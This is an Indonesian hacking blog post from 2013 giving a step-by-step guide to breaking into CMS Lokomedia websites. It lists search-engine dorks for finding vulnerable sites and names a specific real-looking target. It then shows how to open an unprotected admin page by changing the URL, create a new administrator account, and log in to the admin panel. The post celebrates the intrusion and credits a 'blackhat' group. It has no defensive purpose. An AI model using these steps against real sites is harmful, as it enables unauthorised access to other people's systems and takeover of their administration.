Posted by : Ham JavaNet Minggu, 17 Maret 2013

Selamat Weekend Sobat 207CS , ketemu lagi dengan Ane Daffa-x207


kali ini ane mau posting BUG CMS LOKOMEDIA :D langsung disimak ya :P

Langkah Langkah :

1.) Masukan Dork Di www.google.com / www.bing.com


DORK :

inurl:"admin/foto_berita/"
inurl:"media.php?module="
allinurl:/media.php?module=berita



2.) pilih salah satu target ente, misalkan disini target ane adalah http://www.tiketdiskon.net/media.php?module=home



3.) lalu kita ubah URL dari Web tadi itu gan :D dengan mengubahnya / menambahkan setelah alamat web target tersebut denagn injeksi dibawah ini gan :D


Injeksi : /admin/content.php?module=user

#Sebelumnya : http://www.tiketdiskon.net/media.php?module=home



#Sesudah : http://www.tiketdiskon.net/admin/content.php?module=user




4.) Setelah itu klik tambah user, lalu isikan form terserah ente gan lalu klik simpan :P






5.) Setelah itu tinggal login deh di Admin Panelnya :D

http://www.tiketdiskon.net/admin/


6.) Horeee :P Ane udah login di web tersebut gan :D wkwkkw



Sekian dari Saya

Thanks To : Katonz | Surabaya Blackhat

Description: Bug CMS Lokomedia News
Rating: 4.5
Reviewer: Ham JavaNet
ItemReviewed: Bug CMS Lokomedia News

Leave a Reply

Monggo Tinggalkan Jejak Kaks :)

Subscribe to Posts | Subscribe to Comments

Welcome to My Blog

Popular Post

Labels

Arsip Blog

Followers

- Copyright © 2013 shad0w-share | Designed by Johanes Djogan -